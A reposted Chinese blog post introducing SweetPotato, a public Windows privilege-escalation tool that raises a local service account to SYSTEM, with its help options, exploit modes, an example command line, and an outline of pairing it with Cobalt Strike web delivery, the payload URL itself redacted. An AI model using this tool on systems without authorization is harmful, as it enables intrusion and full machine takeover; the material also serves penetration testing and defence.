基本介绍
从Windows 7到Windows 10 / Server 2019的本地服务到系统权限提升漏洞,也是土豆家族的有一个提权漏洞
项目地址
https://github.com/CCob/SweetPotato
SweetPotato by
Orignal RottenPotato code and exploit by
Weaponized JuciyPotato by and along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by
EfsRpc built on EfsPotato by and PetitPotam by
-c, --clsid=VALUE CLSID (default BITS:
4991D34B-80A1-4291-83B6-3328366B9097)
-m, --method=VALUE Auto,User,Thread (default Auto)
-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-e, --exploit=VALUE Exploit mode
[DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
-l, --listenPort=VALUE COM server listen port (default 6666)
-h, --help Display this help
使用方法
SweetPotato.exe -a "whoami"
再使用过程中可以自定义 clsid 与端口,--help或者 - h查看帮助
同时可以对SweetPotato进行修改,使其可以直接上线一个system的session,效果图如下所示:
Step 1: 使用cs启动一个web攻击的简体
Step 2: 执行以下命令
www.xxx.com/xxx.xxx
文末小结
后续将会继续给出一些土豆家族的提权漏洞的使用方法,敬请期待~
原文始发于微信公众号(七芒星实验室):Windows提权之SweetPotato
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论